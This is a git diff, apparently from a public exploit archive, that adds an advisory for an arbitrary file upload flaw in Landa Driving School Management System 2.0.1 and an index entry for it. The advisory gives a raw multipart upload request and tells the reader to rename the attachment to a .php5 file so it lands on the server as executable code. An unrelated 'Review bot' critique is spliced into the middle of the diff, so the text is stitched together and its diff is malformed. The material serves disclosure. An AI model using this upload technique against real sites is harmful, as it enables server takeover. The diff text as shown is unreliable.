diff --git a/exploits/php/webapps/50681.txt b/exploits/php/webapps/50681.txt
new file mode 100644
index 000000000..9d0a0ecac
--- /dev/null
+++ b/exploits/php/webapps/50681.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
+# Version 2.0.1
+# Google Dork: N/A
+# Date: 17/01/2022
+# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
+# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
+Landa Driving School Management System contain arbitrary file upload
+registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw
+
+details
+
+POST /profile/attachment/upload/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: */*
+Accept-Language: ar,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
+Content-Length: 294983
+Origin: https://localhost
+Connection: close
+Referer: https://localhost/profile/91/
+Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="name"
+
+sddd
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="csrf-token"
+
+e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="userid"
+
+91
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5
+Content-Type: image/png
+
+
+you will have a direct link to the uploaded files
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 63127a09f..b2baf55d8 100644
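Review bot: The proof-of-concept request in this file is truncated: the last multipart part stops at `Content-Type: image/png` with no file payload and no closing boundary (`-----------------------------215084716322124620333137564048--`), so the request cannot be replayed as written, and the `Content-Length: 294983` refers to a body the advisory does not show. The inline annotation `>>>>>>>>>>>>>>>> change this to w.php5` is placed inside the `Content-Disposition` header line, so a verbatim copy of the request is malformed; move that instruction onto its own line above the request (e.g. `# Rename the attachment filename from w.php.png to w.php5 before sending`). The closing claim `you will have a direct link to the uploaded files` is not backed by a server response or a served path, so a reader cannot confirm the uploaded `.php5` file is web-reachable, and whether it executes presumably depends on the target's handler mapping for that extension, which the advisory does not establish. Adding the HTTP response (or the attachment URL it returns) and, if observed, a one-line statement of what check the server actually performs on the upload would make the finding verifiable.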
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44758,3 +44758,4 @@ id,file,description,date,author,type,platform,port
 50676,exploits/php/webapps/50676.txt,"uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php,